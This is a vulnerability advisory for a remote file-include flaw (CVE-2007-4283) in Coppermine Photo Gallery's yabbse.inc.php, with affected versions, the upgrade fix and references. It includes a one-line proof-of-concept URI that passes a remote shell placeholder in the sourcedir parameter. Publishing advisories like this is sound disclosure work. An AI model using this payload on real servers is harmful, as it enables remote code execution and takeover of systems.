Coppermine Photo Gallery YABBSE.INC.PHP Remote File Include Vulnerability

Bugtraq ID:	25243
Class:	Input Validation Error
CVE:	CVE-2007-4283
Remote:	Yes
Local:	No
Published:	Aug 08 2007 12:00AM
Updated:	May 07 2015 05:36PM
Credit:	Ma$tEr-0F-De$a$t0r is credited with the discovery of this vulnerability.
Vulnerable:	Coppermine Photo Gallery 1.4 Coppermine Photo Gallery 1.3.4 Coppermine Photo Gallery 1.3.3 Coppermine Photo Gallery 1.3.2 Coppermine Photo Gallery 1.3.1
Not Vulnerable:	Coppermine Photo Gallery 1.4.2

Coppermine Photo Gallery YABBSE.INC.PHP Remote File Include Vulnerability

Coppermine Photo Gallery is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Coppermine 1.3.1 is vulnerable; other versions may also be affected.

Coppermine Photo Gallery YABBSE.INC.PHP Remote File Include Vulnerability

An attacker can exploit this issue via a browser.

The following proof-of-concept URI is available:

http://www.example.com/path/bridge/yabbse.inc.php?sourcedir=[Sh3LL]

Coppermine Photo Gallery YABBSE.INC.PHP Remote File Include Vulnerability

Solution:
Coppermine Photo Gallery 1.4.2 does not include the vulnerable script. See the referenced homepage for instructions on obtaining and installing the most recent version.

Coppermine Photo Gallery YABBSE.INC.PHP Remote File Include Vulnerability

References:

• Coppermine Photo Gallery Homepage (Coppermine Photo Gallery)
  
• Coppermine Photo Gallery (yabbse.inc.php) Remote File Inclusion (Ma$tEr-0F-De$a$t0r )